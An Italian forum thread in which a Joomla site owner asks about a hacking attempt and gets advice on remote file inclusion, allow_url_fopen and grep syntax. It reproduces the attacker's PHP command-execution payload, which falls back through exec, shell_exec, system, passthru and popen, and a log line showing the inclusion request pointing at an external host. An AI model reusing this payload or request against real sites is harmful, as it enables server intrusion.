Tentativo di lameraggio sito basato su joomla

[nobadguy]

Ciao, in un sito basato su joomla, un hacker ha provato questo:

Codice PHP:

<?php
echo "Rocks";
$cmd="id";
$eseguicmd=ex($cmd);
echo $eseguicmd;
function ex($cfe){
$res = '';
if (!empty($cfe)){
if(function_exists('exec')){
@exec($cfe,$res);
$res = join("\n",$res);
}
elseif(function_exists('shell_exec')){
$res = @shell_exec($cfe);
}
elseif(function_exists('system')){
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru')){
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($cfe,"r"))){
$res = "";
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}}
return $res;
}
exit;

questa è la pagina che contiene il codice: http://www.jessicamakeup.com/bbb/skin/zero_vote/id.txt

questo è il relativo log:

codice:

222.236.47.176 - - [17/Dec/2007:23:59:00 +0000] "GET //content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.jessicamakeup.com/bbb/skin/zero_vote/id.txt?? HTTP/1.1" 404 9612 "-" "libwww-perl/5.79"

Nel sito, anche se non credo dipendesse da questo tentativo, è stato aggiunto un iframe... cosa hanno tentato di fare? come posso proteggermi?

Grazie

[Habanero]

è il solito tentativo di remote inclusion... nel tuo caso il file cerca di eseguire comandi di sistema. Il codice 404 indica che l'operazione non è andata a buon fine.

In linea di massima se il file di configurazione di php contiene il parametro allow_url_fopen settato ad off non è possibile includere percorsi remoti.

[nobadguy]

In realtà in questo sito, hanno fatto due cose:

1. hanno creato un iframe in alto e caricavano un sito remoto che (probabilmente) mandava un dialer e qualche virus
2. hanno creato una dir "media" nella docroot dei sito e all'interno ci sono vari file .exe riconosciuti come virus con permessi settati a 600.

Dipende da questi tentativi o da qualcos'altro nel server?

[nobadguy]

all'interno di questa dir media c'è un file chiamato k1.exe che NAV2007 (in locale) elimina e classifica come "hacktool"

[Habanero]

difficile dire cosa sia successo in base a queste informazioni... nei log trovi informazioni riguardo a k1.exe?

[nobadguy]

no, perchè la directory non so quando è stata inserita, come faccio un grep media/k1.exe in un file che non conosco? Nel senso posso cercare una stringa, "k1.exe" appunto, nei vari log del dominio?

Ogni tanto qualche client fa questa richiesta:

codice:

[Thu Dec 20 11:26:39 2007] [error] [client 128.241.45.65] File does not exist: /var/www/html/media/msn.exe

[Habanero]

Originariamente inviato da nobadguy
no, perchè la directory non so quando è stata inserita, come faccio un grep media/k1.exe in un file che non conosco? Nel senso posso cercare una stringa, "k1.exe" appunto, nei vari log del dominio?

Ogni tanto qualche client fa questa richiesta:

codice:

[Thu Dec 20 11:26:39 2007] [error] [client 128.241.45.65] File does not exist: /var/www/html/media/msn.exe

non ho capito il tuo problema... certo che vuoi farlo..

[nobadguy]

intendo dire, io non so in quale log possa trovare la stringa "media/k1.exe" e vorrei dare un comando grep...

quale è la sintassi?

per caso: grep media/k1.exe / ??

[Habanero]

cioè? mi stai chiedendo la sintassi di grep ?
col man avresti già risolto...

puoi fare

cat file | grep pattern

oppure direttamente

grep -a pattern file


la ricerca falla su k1.exe non su media/k1.exe

in ogni caso se il server è linux, k1.exe non può dare nessun effetto negativo visto che è un eseguibile Windows...
La cosa importante per te deve essere capire come ci è arrivato.

[nobadguy]

quello si, ma io non conosco "file"

Mi chiedevo se esisteva un modo per cercare in più directory in una volta sola, l'ho trovato con una prova...

ho fatto grep -a k1.exe */*

e ha cercato nella dir corrente e nelle sottodir...